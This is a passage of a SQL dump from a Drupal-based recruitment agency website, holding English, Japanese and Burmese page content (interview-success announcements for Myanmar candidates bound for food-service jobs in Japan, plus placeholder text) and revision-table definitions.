('activities', 0, 197, 703, 'en', 0, '<p data-start=\"320\" data-end=\"354\"><strong data-start=\"320\" data-end=\"354\">Interview Success Announcement</strong></p><p data-start=\"356\" data-end=\"531\">New Comet Trading Agency is pleased to announce that Ms. Tun Eaindar Moe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"533\" data-end=\"700\">This achievement represents more than a successful interview—it is the beginning of new possibilities and future opportunities in an international working environment.</p><p data-start=\"702\" data-end=\"868\">Through dedication, preparation, and a positive mindset, she has successfully earned the opportunity to move forward toward employment in Japan\'s food service sector.</p><p data-start=\"870\" data-end=\"1008\">We are delighted to celebrate this important milestone and look forward to seeing her continue to grow both personally and professionally.</p><p data-start=\"1010\" data-end=\"1113\">Congratulations to Ms. Tun Eaindar Moe, and we wish her every success in the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 197, 704, 'en', 0, '<p data-start=\"320\" data-end=\"354\"><strong data-start=\"320\" data-end=\"354\">Interview Success Announcement</strong></p><p data-start=\"356\" data-end=\"531\">New Comet Trading Agency is pleased to announce that Ms. Tun Eaindar Moe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"533\" data-end=\"700\">This achievement represents more than a successful interview—it is the beginning of new possibilities and future opportunities in an international working environment.</p><p data-start=\"702\" data-end=\"868\">Through dedication, preparation, and a positive mindset, she has successfully earned the opportunity to move forward toward employment in Japan\'s food service sector.</p><p data-start=\"870\" data-end=\"1008\">We are delighted to celebrate this important milestone and look forward to seeing her continue to grow both personally and professionally.</p><p data-start=\"1010\" data-end=\"1113\">Congratulations to Ms. Tun Eaindar Moe, and we wish her every success in the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 197, 704, 'ja', 0, '<p data-start=\"1269\" data-end=\"1282\"><strong data-start=\"1269\" data-end=\"1282\">面接合格のお知らせ</strong></p><p data-start=\"1284\" data-end=\"1361\">ニューコメット・トレーディング・エージェンシーは、TUN EAINDAR MOE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1363\" data-end=\"1413\">今回の合格は、単なる面接成功にとどまらず、日本での新たな可能性と将来への第一歩となる大切な成果です。</p><p data-start=\"1415\" data-end=\"1457\">ご本人の努力と前向きな姿勢、そして十分な準備が今回の素晴らしい結果につながりました。</p><p data-start=\"1459\" data-end=\"1496\">今後、日本で多くの経験を積みながら成長されることを心より期待しております。</p><p data-start=\"1498\" data-end=\"1515\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 198, 705, 'en', 0, '<p data-start=\"337\" data-end=\"371\"><strong data-start=\"337\" data-end=\"371\">Interview Success Announcement</strong></p><p data-start=\"373\" data-end=\"550\">New Comet Trading Agency is pleased to announce that Ms. Mai Thandar Naing has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"552\" data-end=\"786\">This achievement reflects her dedication, hard work, and commitment to pursuing new career opportunities abroad. Passing the interview is an important accomplishment that brings her one step closer to achieving her professional goals.</p><p data-start=\"788\" data-end=\"964\">The Food Service sector in Japan provides valuable opportunities to gain practical experience, develop workplace skills, and build a strong foundation for future career growth.</p><p data-start=\"966\" data-end=\"1162\">We are proud of her success and extend our heartfelt congratulations on this important milestone. We wish her continued success in the next stages of the process and in her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 198, 706, 'en', 0, '<p data-start=\"337\" data-end=\"371\"><strong data-start=\"337\" data-end=\"371\">Interview Success Announcement</strong></p><p data-start=\"373\" data-end=\"550\">New Comet Trading Agency is pleased to announce that Ms. Mai Thandar Naing has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"552\" data-end=\"786\">This achievement reflects her dedication, hard work, and commitment to pursuing new career opportunities abroad. Passing the interview is an important accomplishment that brings her one step closer to achieving her professional goals.</p><p data-start=\"788\" data-end=\"964\">The Food Service sector in Japan provides valuable opportunities to gain practical experience, develop workplace skills, and build a strong foundation for future career growth.</p><p data-start=\"966\" data-end=\"1162\">We are proud of her success and extend our heartfelt congratulations on this important milestone. We wish her continued success in the next stages of the process and in her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 198, 706, 'ja', 0, '<p data-start=\"1320\" data-end=\"1333\"><strong data-start=\"1320\" data-end=\"1333\">面接合格のお知らせ</strong></p><p data-start=\"1335\" data-end=\"1414\">ニューコメット・トレーディング・エージェンシーは、MAI THANDAR NAING さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1416\" data-end=\"1465\">今回の合格は、ご本人の努力と熱意の成果であり、日本でのキャリア実現に向けた大切な前進となりました。</p><p data-start=\"1467\" data-end=\"1510\">日本の外食業界では、多くの実務経験やスキル向上の機会があり、今後の成長が期待されます。</p><p data-start=\"1512\" data-end=\"1562\">この素晴らしい成果を心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 199, 707, 'en', 0, '<p data-start=\"310\" data-end=\"344\"><strong data-start=\"310\" data-end=\"344\">Interview Success Announcement</strong></p><p data-start=\"346\" data-end=\"519\">New Comet Trading Agency is delighted to announce that Ms. Ei Zin Htwe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"521\" data-end=\"737\">Every achievement begins with dedication and consistent effort. Through her commitment to learning and careful preparation, she has successfully achieved an important milestone on her path toward employment in Japan.</p><p data-start=\"739\" data-end=\"908\">This accomplishment not only reflects her hard work but also demonstrates her readiness to take on new challenges and opportunities within Japan\'s food service industry.</p><p data-start=\"910\" data-end=\"1040\">We warmly congratulate Ms. Ei Zin Htwe on her success and wish her the very best as she proceeds to the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 199, 708, 'en', 0, '<p data-start=\"310\" data-end=\"344\"><strong data-start=\"310\" data-end=\"344\">Interview Success Announcement</strong></p><p data-start=\"346\" data-end=\"519\">New Comet Trading Agency is delighted to announce that Ms. Ei Zin Htwe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"521\" data-end=\"737\">Every achievement begins with dedication and consistent effort. Through her commitment to learning and careful preparation, she has successfully achieved an important milestone on her path toward employment in Japan.</p><p data-start=\"739\" data-end=\"908\">This accomplishment not only reflects her hard work but also demonstrates her readiness to take on new challenges and opportunities within Japan\'s food service industry.</p><p data-start=\"910\" data-end=\"1040\">We warmly congratulate Ms. Ei Zin Htwe on her success and wish her the very best as she proceeds to the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 199, 708, 'ja', 0, '<p data-start=\"1192\" data-end=\"1205\"><strong data-start=\"1192\" data-end=\"1205\">面接合格のお知らせ</strong></p><p data-start=\"1207\" data-end=\"1280\">ニューコメット・トレーディング・エージェンシーは、EI ZIN HTWE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1282\" data-end=\"1334\">今回の合格は、日々の努力と継続的な学習の成果であり、日本で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1336\" data-end=\"1390\">この成果は、ご本人の熱意と準備の積み重ねによって実現したものであり、今後のさらなる成長と活躍が期待されます。</p><p data-start=\"1392\" data-end=\"1439\">心よりお祝い申し上げるとともに、日本での新しい挑戦が素晴らしいものとなることを願っております。</p>', '', 'full_html'),
('activities', 0, 200, 709, 'en', 0, '<p data-start=\"330\" data-end=\"364\"><strong data-start=\"330\" data-end=\"364\">Interview Success Announcement</strong></p><p data-start=\"366\" data-end=\"542\">New Comet Trading Agency is pleased to announce that Ms. Htay Htay Khaing has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"544\" data-end=\"699\">This achievement reflects her willingness to learn, determination to succeed, and readiness to take on new challenges in an international work environment.</p><p data-start=\"701\" data-end=\"919\">Passing the interview is an important step toward joining Japan\'s food service industry, where she will have opportunities to gain practical experience, strengthen her professional skills, and build a rewarding career.</p><p data-start=\"921\" data-end=\"1066\">We congratulate Ms. Htay Htay Khaing on this accomplishment and wish her continued success as she moves forward to the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 200, 710, 'en', 0, '<p data-start=\"330\" data-end=\"364\"><strong data-start=\"330\" data-end=\"364\">Interview Success Announcement</strong></p><p data-start=\"366\" data-end=\"542\">New Comet Trading Agency is pleased to announce that Ms. Htay Htay Khaing has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"544\" data-end=\"699\">This achievement reflects her willingness to learn, determination to succeed, and readiness to take on new challenges in an international work environment.</p><p data-start=\"701\" data-end=\"919\">Passing the interview is an important step toward joining Japan\'s food service industry, where she will have opportunities to gain practical experience, strengthen her professional skills, and build a rewarding career.</p><p data-start=\"921\" data-end=\"1066\">We congratulate Ms. Htay Htay Khaing on this accomplishment and wish her continued success as she moves forward to the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 200, 710, 'ja', 0, '<p data-start=\"1223\" data-end=\"1236\"><strong data-start=\"1223\" data-end=\"1236\">面接合格のお知らせ</strong></p><p data-start=\"1238\" data-end=\"1316\">ニューコメット・トレーディング・エージェンシーは、HTAY HTAY KHAING さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1318\" data-end=\"1373\">今回の合格は、新しいことに挑戦する意欲と努力の成果であり、日本でのキャリア実現に向けた大切な一歩となりました。</p><p data-start=\"1375\" data-end=\"1425\">外食業界での経験を通じて、多くの知識や技術を身につけ、さらなる成長につながることを期待しております。</p><p data-start=\"1427\" data-end=\"1467\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html'),
('language_center', 0, 204, 715, 'ja', 0, '<p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p>', '', 'full_html'),
('language_center', 0, 204, 716, 'ja', 0, '<p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p>', '', 'full_html'),
('language_center', 0, 204, 719, 'en', 0, '<p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p>', '', 'full_html'),
('language_center', 0, 204, 719, 'ja', 0, '<p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p>', '', 'full_html'),
('language_center', 0, 204, 720, 'en', 0, '<p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p>', '', 'full_html'),
('language_center', 0, 204, 720, 'ja', 0, '<p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p>', '', 'full_html'),
('language_center', 0, 205, 717, 'ja', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 205, 718, 'en', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 205, 718, 'ja', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 205, 721, 'en', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 205, 721, 'ja', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 206, 722, 'ja', 0, '<p>dsfsdfsd sdfs dfsdf</p>', '', 'full_html'),
('language_center', 0, 206, 723, 'ja', 0, '<p>dsfsdfsd sdfs dfsdf</p>', '', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__comment`
--

CREATE TABLE `node_revision__comment` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `comment_status` int NOT NULL DEFAULT '0' COMMENT 'Whether comments are allowed on this entity: 0 = no, 1 = closed (read only), 2 = open (read/write).'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field comment.';

-- --------------------------------------------------------

--
-- Table structure for table `node_revision__field_activities_description`
--

CREATE TABLE `node_revision__field_activities_description` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_activities_description_value` longtext NOT NULL,
  `field_activities_description_summary` longtext,
  `field_activities_description_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for node field field_activities…';

--
-- Dumping data for table `node_revision__field_activities_description`
--

INSERT INTO `node_revision__field_activities_description` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_activities_description_value`, `field_activities_description_summary`, `field_activities_description_format`) VALUES
('activities', 0, 6, 11, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
